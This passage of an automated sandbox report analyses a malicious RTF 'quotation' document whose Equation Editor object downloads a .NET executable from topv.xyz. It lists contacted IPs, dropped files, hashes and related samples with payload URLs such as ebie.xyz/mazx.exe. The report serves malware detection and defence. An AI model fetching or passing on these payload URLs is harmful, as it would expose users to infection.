http://search.yahoo.co.jp/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.gmarket.co.kr/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.nifty.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://searchresults.news.com.au/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.google.si/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.cz/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.soso.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.univision.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ebay.it/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://images.joins.com/ui_c/fvc_joins.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.asharqalawsat.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://busca.orange.es/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://cnweb.search.live.com/results.aspx?q=	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 00000007.00000000.2208825843.000000000A330000.00000008.00000001.sdmp	false		high
http://search.yahoo.co.jp	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.target.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscador.terra.es/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.orange.co.uk/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.iask.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.tesco.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://cgi.search.biglobe.ne.jp/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.seznam.cz/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://suche.freenet.de/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.interpark.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://clients5.google.com/complete/search?hl=	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ipop.co.kr/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://investor.msn.com/	explorer.exe, 00000007.00000000.2193639072.0000000003C40000.00000002.00000001.sdmp	false		high
http://search.espn.go.com/	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.myspace.com/favicon.ico	explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.239.243.112	topv.xyz	Moldova Republic of		55933	CLOUDIE-AS-APCloudieLimitedHK	true
45.64.105.11	www.anandsharmah.com	India		132335	NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	452514
Start date:	22.07.2021
Start time:	14:20:20
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 59s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	QUOTATION1100630004R2.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@9/10@4/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 16.9% (good quality ratio 16.2%) Quality average: 75.5% Quality standard deviation: 26.9%
HCA Information:	Successful, ratio: 96% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe TCP Packets have been reduced to 100 Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:20:37	API Interceptor	37x Sleep call for process: EQNEDT32.EXE modified
14:20:39	API Interceptor	281x Sleep call for process: princedan85671.exe modified
14:21:45	API Interceptor	210x Sleep call for process: netsh.exe modified
14:22:21	API Interceptor	1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.239.243.112	PO4018308875.doc	Get hash	malicious	Browse	topv.xyz/princedanx.exe
	ORDER . 4500028602 .doc	Get hash	malicious	Browse	sabaint.me/polanco/peso.exe
	Document02.doc	Get hash	malicious	Browse	ebie.xyz/whesilox.exe
	product list.doc	Get hash	malicious	Browse	ebie.xyz/arinzex.exe
	Doc56576847896543987652134.doc	Get hash	malicious	Browse	ebie.xyz/catx.exe
	KOC_RFQ.doc	Get hash	malicious	Browse	ebie.xyz/mazx.exe
	RFQ.doc	Get hash	malicious	Browse	ebie.xyz/mazx.exe
	RFQ NO. 352008.doc	Get hash	malicious	Browse	ebie.xyz/quotation.exe
	Reques for quotation 775887886966.doc	Get hash	malicious	Browse	ebie.xyz/ugopoundx.exe
	6AOqEvqF3M.exe	Get hash	malicious	Browse	sabaint.me/inc/4f4d258ff734e9.php
	ORDER_683703789238738.xlsx	Get hash	malicious	Browse	sabaint.me/inc/4f4d258ff734e9.php
	product list.doc	Get hash	malicious	Browse	ebie.xyz/arinzex.exe
	KV18RE001-A5193.doc	Get hash	malicious	Browse	ebie.xyz/whesilox.exe
	REQUIREMENT-DWG-454888_2021.doc	Get hash	malicious	Browse	ebie.xyz/whesilox.exe
	purchase order.doc	Get hash	malicious	Browse	ebie.xyz/mazx.exe
	product list.doc	Get hash	malicious	Browse	ebie.xyz/arinzex.exe
	M9M9ZylTGS.exe	Get hash	malicious	Browse	sabaint.me/inc/4f4d258ff734e9.php
	FLK0057021_1062.doc	Get hash	malicious	Browse	ebie.xyz/whesilox.exe
	DOC.1000000567.267805032019.doc__.rtf	Get hash	malicious	Browse	ebie.xyz/catx.exe
	13076885-RFQ.doc	Get hash	malicious	Browse	lontorz.xyz/bigheadx.exe
45.64.105.11	Bank Swift TT.exe	Get hash	malicious	Browse	www.anandsharmah.com/ga4/?XPDdMlTp=v1u/ytfnbZkXhsslYSykJ5zelYt7tjisioYUg7PcNA6TN9Cn89pOzUXIMNxIfUg0v0/j&VPgP5=lhidFTWp_NePJ0t

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.anandsharmah.com	Bank Swift TT.exe	Get hash	malicious	Browse	45.64.105.11
topv.xyz	PO4018308875.doc	Get hash	malicious	Browse	185.239.243.112

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDIE-AS-APCloudieLimitedHK	PO4018308875.doc	Get hash	malicious	Browse	185.239.243.112
	ORDER . 4500028602 .doc	Get hash	malicious	Browse	185.239.243.112
	Document02.doc	Get hash	malicious	Browse	185.239.243.112
	product list.doc	Get hash	malicious	Browse	185.239.243.112
	jEbpttXKCa	Get hash	malicious	Browse	45.114.9.184
	Doc56576847896543987652134.doc	Get hash	malicious	Browse	185.239.243.112
	KOC_RFQ.doc	Get hash	malicious	Browse	185.239.243.112
	RFQ.doc	Get hash	malicious	Browse	185.239.243.112
	RFQ NO. 352008.doc	Get hash	malicious	Browse	185.239.243.112
	Reques for quotation 775887886966.doc	Get hash	malicious	Browse	185.239.243.112
	6AOqEvqF3M.exe	Get hash	malicious	Browse	185.239.243.112
	ORDER_683703789238738.xlsx	Get hash	malicious	Browse	185.239.243.112
	product list.doc	Get hash	malicious	Browse	185.239.243.112
	KV18RE001-A5193.doc	Get hash	malicious	Browse	185.239.243.112
	REQUIREMENT-DWG-454888_2021.doc	Get hash	malicious	Browse	185.239.243.112
	purchase order.doc	Get hash	malicious	Browse	185.239.243.112
	product list.doc	Get hash	malicious	Browse	185.239.243.112
	M9M9ZylTGS.exe	Get hash	malicious	Browse	185.239.243.112
	FLK0057021_1062.doc	Get hash	malicious	Browse	185.239.243.112
	DOC.1000000567.267805032019.doc__.rtf	Get hash	malicious	Browse	185.239.243.112
NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN	A5F5FC2F6E2C6E6318BE4A81AFF84D55ECDAA21E6EF68.exe	Get hash	malicious	Browse	103.83.192.117
	1234.xlsm	Get hash	malicious	Browse	103.205.143.227
	12345.xlsm	Get hash	malicious	Browse	103.205.143.227
	1234.xlsm	Get hash	malicious	Browse	103.205.143.227
	documents-748443571.xlsm	Get hash	malicious	Browse	103.205.143.227
	12345.xlsm	Get hash	malicious	Browse	103.205.143.227
	documents-1887159634.xlsm	Get hash	malicious	Browse	103.205.143.227
	documents-748443571.xlsm	Get hash	malicious	Browse	103.205.143.227
	documents-1887159634.xlsm	Get hash	malicious	Browse	103.205.143.227
	documents-683917632.xlsm	Get hash	malicious	Browse	103.205.143.227
	documents-683917632.xlsm	Get hash	malicious	Browse	103.205.143.227
	documents-1760163871.xlsm	Get hash	malicious	Browse	103.205.143.227
	documents-1760163871.xlsm	Get hash	malicious	Browse	103.205.143.227
	ogknJKPa1C.apk	Get hash	malicious	Browse	43.228.237.131
	ogknJKPa1C.apk	Get hash	malicious	Browse	43.228.237.131
	#Ud83d#Udd04bvoneida- empirix.com iPhone 8 104 OKeep.htm	Get hash	malicious	Browse	103.83.192.66
	PI.exe	Get hash	malicious	Browse	103.250.186.101
	#Uc138#Uae08 #Uacc4#Uc0b0#Uc11c.exe	Get hash	malicious	Browse	103.205.143.111
	22 FEB -PROCESSING.xlsx	Get hash	malicious	Browse	103.250.186.248
	4vnTrjsACd.rtf	Get hash	malicious	Browse	103.250.186.248

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Roaming\princedan85671.exe	PO4018308875.doc	Get hash	malicious	Browse
C:\Users\user\AppData\Roaming\princedan85671.exe	9thuIDnsFV.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\princedan85671.exe	PO4018308875.doc	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\princedan85671.exe	9thuIDnsFV.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe	PO4018308875.doc	Get hash	malicious	Browse
	9thuIDnsFV.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	648912
Entropy (8bit):	6.555584592279825
Encrypted:	false
SSDEEP:	12288:6j5EWCz96Q2vEq5GzUf5qvrcL1DCiTal1VPVhIHHZ25x:61EWMkzGUkrcJafVPUHZ2b
MD5:	0E715DB2198FF670F4BF0E88E0E9B547
SHA1:	2DE5030A9261655E5879E4FABA7B5E79D1DD483E
SHA-256:	4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
SHA-512:	8FB7EA121D51C489BAC9D8D6B35E94FC8BC5E5E218DA53AD952326F6C558FA7484E54842B2C6ABBA36C5EC5BB0E6EB51FDAB46B3F98DAEE3569EF8C6EC400BCD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Joe Sandbox View:	Filename: PO4018308875.doc, Detection: malicious, Browse Filename: 9thuIDnsFV.exe, Detection: malicious, Browse
Reputation:	low
IE Cache URL:	http://topv.xyz/princedanx.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.....................,........... ........@.. ....................... ............@.................................<...W........(........................................................................... ............... ..H............text........ ...................... ..`.rsrc....(.........................@..@.reloc..............................@..B................x.......H................... ....1...n...........................................0.............-.&(....+.&+.....0..........s....(....t.....-.&+......+.....~......0..%........(.......,.&&...-.&&+.}....+.}....+.....0..\........(.... .U...-.&.s.....-.&&(....~....%-/+.(....+.}....+.&~..........s....%.-.&+......+.o.....0..).........s.....,.&..(....-.+..+..{.....o..........0..$.........(.....-.&.,.+..+..{.....o....&...0.............-.&{.......-.&o....+.&+.&+.*..0.............-.&{.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{23BE6748-299E-4B99-A605-44EE5B79BCDD}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B83DDB5-D064-451A-A615-F9D5A3E063B2}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3552372526077499
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbn:IiiiiiiiiifdLloZQc8++lsJe1Mzeb
MD5:	ECC8322444DA5FF31E85C5208AB7D8B7
SHA1:	9CFBD98CAEAE1DB1D2A96036A44BF7CBB4CCFE30
SHA-256:	D70F2B2BE33192018BC1124AFE3A3987DAC6A18F698E65A41BE83510EFBDF3B2
SHA-512:	12563875874E78B6D28FBDE53934902C373823CDE5E7E35A55C137E3B34D4C165112D98CF60ACE63B585341114DD968221694AABA43E4F778FDBA80BE430CC1C
Malicious:	false
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E2185495-5638-43A1-A616-4B202C23444A}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	8282
Entropy (8bit):	3.4624394858879235
Encrypted:	false
SSDEEP:	192:eWzk4NbraJaqmVEQuU+AJlP2FXsdlYYf1El+oQZ:eWzk2va0JBPJleFXbYfKl+ZZ
MD5:	8008129AB070F6B10998589301C4E734
SHA1:	139A790BAD7E341E4D667109CB0F08C0A2EB7CC7
SHA-256:	8E9D284967EFF29DB850A309789BF09122CFA87E95191D750132CD34B39B8AE5
SHA-512:	493AA79FDC5FEFB73FD9C61B35F9E58227880C4737E6192B8D475A5479955C7130B81D9BE96C964E4166D1A999E21BD4344B7F2743DA237225DA1EA35D3B3DBA
Malicious:	false
Preview:	&...:.&._.(.?...2..+.~.`.0.,.&....8.(.`.+.3.0.>.8.,.%.~.5.$..;.3.8.2.).6.3.?.%.\|.@.9.9...,.$.~.4.%.:.-.).@.[.1.@.?...?...6.....?.~.4.].!.6.\|.?._.5.`.6.?./.0.0.9.$.\|.....5.3.:.#.'.8.[.$._.2.#.(.3.%.?.6.1.?.8.[.[.?.%.>...-.<.!...6.?.9.>.@.9.3.?...-.!.:...6.3.?.2.0.\|.?.~.#.?.:.1.-..?.[.#.$..%._.=.,.<...1.-...`.+.'.....<.9.$.>.`.+./.\|.#.6./.@.(.).$.?..!.].-.?.4.,.~.!.2.$.%.#.?...4.3.=.^.].?.!.7.&.<.%.(./...,.$.#.^.[.?.'.^.#.8.~.?.0.].4.4.?.1...2.[.~.5.<.~.1.;.^.,.$.\|...8.0._.,.-...?.\|.!._.(.\|...;.!.?.!...?.?.?.<.1.^...(...>.0.<.#.@.+...,.].(.(./...6...9.'.0..-.8.&.3.^.9.8.=.!.?.0.=.../.3.3.7.%.?...>.(.&.?.@.$.?.&.?.).6.7.>.!...%.$.(.,.#.>...=.?.6...2.1.'.:.@.<...&.?.#.0...^.,.?.\|.=.1.....#.[...(._.2.?.>.9...,.2.8./.>.?.5.3.!.?.7.3.$.0.?...7.8...4.~.-.9.'.2.].#.:.<.?.?.2.?...:.7....?..].>.?.?.@.2.3.3.^...]...)._.~._.\|.$.5.=.-.7.?.1...3.3.6./.`.4.\|.:...[.=.1.:.^.&./.(._._.9...-.\|.?.0.).:.0.<.;.@.=.?...'.=...@.`.?.).\|.#.%.(.&.<.~.#.>.).6.?.....;./.9.].`.6.?.?.4.4.>...).6.(.>.2.#.3..

C:\Users\user\AppData\Local\Temp\princedan85671.exe Download File
Process:	C:\Users\user\AppData\Roaming\princedan85671.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	648912
Entropy (8bit):	6.555584592279825
Encrypted:	false
SSDEEP:	12288:6j5EWCz96Q2vEq5GzUf5qvrcL1DCiTal1VPVhIHHZ25x:61EWMkzGUkrcJafVPUHZ2b
MD5:	0E715DB2198FF670F4BF0E88E0E9B547
SHA1:	2DE5030A9261655E5879E4FABA7B5E79D1DD483E
SHA-256:	4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
SHA-512:	8FB7EA121D51C489BAC9D8D6B35E94FC8BC5E5E218DA53AD952326F6C558FA7484E54842B2C6ABBA36C5EC5BB0E6EB51FDAB46B3F98DAEE3569EF8C6EC400BCD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Joe Sandbox View:	Filename: PO4018308875.doc, Detection: malicious, Browse Filename: 9thuIDnsFV.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.....................,........... ........@.. ....................... ............@.................................<...W........(........................................................................... ............... ..H............text........ ...................... ..`.rsrc....(.........................@..@.reloc..............................@..B................x.......H................... ....1...n...........................................0.............-.&(....+.&+.....0..........s....(....t.....-.&+......+.....~......0..%........(.......,.&&...-.&&+.}....+.}....+.....0..\........(.... .U...-.&.s.....-.&&(....~....%-/+.(....+.}....+.&~..........s....%.-.&+......+.o.....0..).........s.....,.&..(....-.+..+..{.....o..........0..$.........(.....-.&.,.+..+..{.....o....&...0.............-.&{.......-.&o....+.&+.&+.*..0.............-.&{.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\QUOTATION1100630004R2.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Thu Jul 22 20:20:35 2021, length=56031, window=hide
Category:	dropped
Size (bytes):	2138
Entropy (8bit):	4.537744225044959
Encrypted:	false
SSDEEP:	48:88/XT0jqsE6nhwNaaQh28/XT0jqsE6nhwNaaQ/:88/Xojqs7SNaaQh28/Xojqs7SNaaQ/
MD5:	CA074A76AD0FDB17342D7B4DB111258A
SHA1:	8B697BA6DE101602BDE6107742FBFDF6D01C6B92
SHA-256:	6BF47A3337E2CB5238244E748C918E20B3AE66321ED52E54E3EBA9898CC8F6E3
SHA-512:	C7C07953F0643148C81076D45CB953BCFA1BC9425D50AAA3C3AEDFF8271367A01B1AD31784A6BC876245928709B90F9DAEF4A4B3705BD697A2ECD9FE3D17603E
Malicious:	false
Preview:	L..................F.... ........{.......{...^.i?................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....\|.2......R.. .QUOTAT~1.DOC..`.......Q.y.Q.y...8.....................Q.U.O.T.A.T.I.O.N.1.1.0.0.6.3.0.0.0.4.R.2...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\830021\Users.user\Desktop\QUOTATION1100630004R2.doc.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.Q.U.O.T.A.T.I.O.N.1.1.0.0.6.3.0.0.0.4.R.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......830021.........

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	101
Entropy (8bit):	4.35988902215508
Encrypted:	false
SSDEEP:	3:M1J5AU/KVxLBCsfx8AU/KVxLBCmX1J5AU/KVxLBCv:MGUWf/UWWUWU
MD5:	B3D87E5035D8CA3C577815ED884DE388
SHA1:	59D79F74E6CFC8BDB45D8E87EF1EE666E2CFDF9E
SHA-256:	CADEB54C8EABB7FFF16E1CEBD6560C2BAAD087077040DB9BF1B9E5A1A0DA9ED4
SHA-512:	257F0A265F8DE710FD539844D941FDCAE694B527FF8171FA99D7082AF3BBE3AAF4CD504A93C2B90D82DC7D7DBFF983274E35C204E7057D24EF52EF13EF2FD870
Malicious:	false
Preview:	[doc]..QUOTATION1100630004R2.LNK=0..QUOTATION1100630004R2.LNK=0..[doc]..QUOTATION1100630004R2.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4311600611816426
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVydH/5llORewrU9lln:vdsCkWtORWRjYl
MD5:	390880DCFAA790037FA37F50A7080387
SHA1:	760940B899B1DC961633242DB5FF170A0522B0A5
SHA-256:	BE4A99C0605649A08637AC499E8C871B5ECA2BAA03909E8ADBAA4C7A6A1D5391
SHA-512:	47E6AC186253342882E375AA38252D8473D1CA5F6682FABD5F459E1B088B935E326E1149080E0FE94AB176A101BA2CB9E8B700AB5AFAE26F865982A8DA295FD3
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\user\AppData\Roaming\princedan85671.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	648912
Entropy (8bit):	6.555584592279825
Encrypted:	false
SSDEEP:	12288:6j5EWCz96Q2vEq5GzUf5qvrcL1DCiTal1VPVhIHHZ25x:61EWMkzGUkrcJafVPUHZ2b
MD5:	0E715DB2198FF670F4BF0E88E0E9B547
SHA1:	2DE5030A9261655E5879E4FABA7B5E79D1DD483E
SHA-256:	4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
SHA-512:	8FB7EA121D51C489BAC9D8D6B35E94FC8BC5E5E218DA53AD952326F6C558FA7484E54842B2C6ABBA36C5EC5BB0E6EB51FDAB46B3F98DAEE3569EF8C6EC400BCD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Joe Sandbox View:	Filename: PO4018308875.doc, Detection: malicious, Browse Filename: 9thuIDnsFV.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.....................,........... ........@.. ....................... ............@.................................<...W........(........................................................................... ............... ..H............text........ ...................... ..`.rsrc....(.........................@..@.reloc..............................@..B................x.......H................... ....1...n...........................................0.............-.&(....+.&+.....0..........s....(....t.....-.&+......+.....~......0..%........(.......,.&&...-.&&+.}....+.}....+.....0..\........(.... .U...-.&.s.....-.&&(....~....%-/+.(....+.}....+.&~..........s....%.-.&+......+.o.....0..).........s.....,.&..(....-.+..+..{.....o..........0..$.........(.....-.&.,.+..+..{.....o....&...0.............-.&{.......-.&o....+.&+.&+.*..0.............-.&{.

C:\Users\user\Desktop\~$OTATION1100630004R2.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4311600611816426
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVydH/5llORewrU9lln:vdsCkWtORWRjYl
MD5:	390880DCFAA790037FA37F50A7080387
SHA1:	760940B899B1DC961633242DB5FF170A0522B0A5
SHA-256:	BE4A99C0605649A08637AC499E8C871B5ECA2BAA03909E8ADBAA4C7A6A1D5391
SHA-512:	47E6AC186253342882E375AA38252D8473D1CA5F6682FABD5F459E1B088B935E326E1149080E0FE94AB176A101BA2CB9E8B700AB5AFAE26F865982A8DA295FD3
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	2.1171698214570647
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	QUOTATION1100630004R2.doc
File size:	56031
MD5:	a3336f2a85c572aab40243c347ebfe59
SHA1:	f6b300530f6d294ea005b13ec08d881c9651f8af
SHA256:	9604fbb0d387877ea857295c8b350e75d5adedc3907bc25f19baf16fff3b0d05
SHA512:	b4a02c7df3537f861429346bd2813de9f89cdb18fb867b8f9eb140d6e2d190bf1a9ff33302e919c111b1e379ef09840c8c1c8289d7fb20fbe2fff4268ea085cf
SSDEEP:	192:LxTMzqwN3qeMDey6Bd86pouUDGQarNRJ+VoF77D4gVsJHMhOUtD:lTwjMOx7bL1+CN/dVQHgOWD
File Content Preview:	{\rtf7734&.:&_(?.2+~`0,&.8(`+30>8,%~5$;382)63?%\|@99.,$~4%:-)@[1@?.?.6..?~4]!6\|?_5`6?/009$\|..53:#'8[$_2#(3%?61?8[[?%>.-<!.6?9>@93?.-!:.63?20\|?~#?:1-?[#$%_=,<.1-.`+'..<9$>`+/\|#6/@()$?!]-?4,~!2$%#?.43=^]?!7&<%(/.,$#^[?'^#8~?0]44?1.2[~5<~1;^,$\|.80_,-.?\|

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00000E59h								no
1	00000E35h	2	embedded	EQuAtIOn.3	1627				no

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 22, 2021 14:21:11.375617981 CEST	49167	80	192.168.2.22	185.239.243.112
Jul 22, 2021 14:21:11.429611921 CEST	80	49167	185.239.243.112	192.168.2.22
